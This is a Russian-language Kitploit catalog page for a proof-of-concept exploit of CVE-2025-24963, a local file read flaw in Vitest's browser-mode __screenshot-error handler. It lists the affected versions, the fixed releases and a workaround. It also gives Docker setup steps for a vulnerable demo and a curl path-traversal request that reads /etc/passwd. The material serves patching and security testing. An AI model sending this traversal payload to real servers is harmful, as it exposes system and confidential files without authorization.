Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24963 — Эксплойт доказательства концепции для CVE-2025-24963, уязвимости локального чтения файлов в режиме браузера Vitest через обработчик __screenshot-error, позволяющей раскрытие произвольных файлов на открытых серверах. | Kitploit
Инструменты/GitHubGitHub/hiteshpatra/cve-2025-24963
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubhiteshpatra/cve-2025-24963

CVE-2025-24963

Эксплойт доказательства концепции для CVE-2025-24963, уязвимости локального чтения файлов в режиме браузера Vitest через обработчик __screenshot-error, позволяющей раскрытие произвольных файлов на открытых серверах.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24963 - Режим браузера Vitest - Чтение локального файла

CVE-2025-24963 — это уязвимость средней степени серьезности (оценка CVSS 3.1: 5.9), затрагивающая пакет @vitest/browser, компонент фреймворка тестирования Vitest на основе Vite. Эта уязвимость возникает из-за неправильной проверки входных данных в обработчике __screenshot-error HTTP-сервера в режиме браузера. Если сервер открыт для сети с помощью опции конфигурации browser.api.host: true, злоумышленник может отправить специально созданные запросы для доступа к произвольным файлам в файловой системе сервера, что потенциально может привести к несанкционированному раскрытию конфиденциальной информации.

Затронутые версии

Уязвимость затрагивает следующие версии @vitest/browser:​

  • с 2.0.4 по 2.1.8
  • с 3.0.0 по 3.0.3​

Устранение

Эта проблема была исправлена в версиях 2.1.9 и 3.0.4. Настоятельно рекомендуется обновить эти или более новые версии для устранения уязвимости.​

Обходной путь

Если немедленное обновление невозможно, временным обходным решением является избегание открытия сервера режима браузера для сети, не устанавливая в вашей конфигурации. Это предотвратит внешний доступ к уязвимому обработчику.

browser.api.host: true

Подготовка окружения

root@kitploit:~
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963

Примечание: Порт, используемый Vitest, является динамическим (например, 63315). Рекомендуется следить за логами и соответствующим образом настраивать флаг -p.

Эксплойт

root@kitploit:~
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
Скачать инструмент